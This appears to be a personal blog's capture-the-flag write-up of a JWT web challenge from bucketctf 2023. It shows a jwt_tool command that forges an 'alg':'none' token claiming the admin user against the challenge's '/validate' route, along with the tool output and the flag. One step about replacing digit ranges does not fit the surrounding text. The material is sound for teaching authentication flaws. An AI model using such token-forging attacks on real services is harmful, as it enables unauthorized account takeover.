n0x - Home



                              7f454c4648656c7
                            f454,aoooooooa,c464
                          8656,oY"c6c6f2c"Yo,2077
                         0100,oY000003003e0Yo,00c0
                         0000oo0000000000c00oo0000
                         0c00oo0000 N0X 0000oo0000
                         0f05oo5f3cf4ff711fboo20e1
                         400e`obb0638000100do'1500
                          ff71`obada545e0ado'f05b
                            0e73"YoooooooY"1ffe
                              bdf6f726c64210a




[main] [about me] [writeups]                            Made with ❤ by n0x


Auth @ bucketctf 2023                                                 (web)


------ Description --------------------------------------------------------

> I just started learning about a new authentication method called JWT.
> This is my first website with it, could you check if its secure?


------ TL;DR --------------------------------------------------------------

As the description indicates, we will certainly have to exploit a JWT 
vulnerability, on the website there is a '/register' page which allows us
to register and thus be able to have JWT tokens for our account.

However no route accessible by default allows us to provide a JWT token to 
the server.

So we just have to find a route or a way to send a JWT token to the server 
to be able to try to bypass this authentication.


------ Solution -----------------------------------------------------------

First i ran a gobuster on the website to see if there is a page where we
can provide a JWT token.



The '/info' route lead to a '/validate' route needing a token as a GET
parameter.

We will now try to exploit the JWT token with the jwt_tool
fork of dillonfrank to have a support of GET parameters.

Then i replaced '[0-4]' with '0' and '[5-9]' with '1'.

=== shell =================================================================
~$ python3 jwt_tool.py -M at -t "http://213.133.103.186:6307/validate?" \
-gd "token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6InRlc3Q \
yIiwiaWF0IjoxNjgwOTk2ODgyfQ.2qodlmGmM19ZFZE-aCWb1FyC9YNiHwxrRw2Bu3WX840"\
-I -pc username -pv admin

[...]
jwttool_e0e5c45b9f118f38e4bccbf97821f92e Exploit: "alg":"none" (-X a) 
Response Code: 200, 37 bytes
[...]

~$ python3 jwt_tool.py -Q "jwttool_e0e5c45b9f118f38e4bccbf97821f92e"
===========================================================================

We can see that the server return a 200 with a none algorithm, we can just
query the result and we get the flag.


------ Flag ---------------------------------------------------------------

bucket{1_l0v3_jwt!!!1!!!!1!!!!!1111!}



___________________________________________________________________________

          [X] [github] [hackthebox] [root-me] [tryhackme] [ctftime]                    

        I also do some photograhy (pcb/die, animals, landscapes, etc).
             Feel free to check my Gurushots and Flickr profile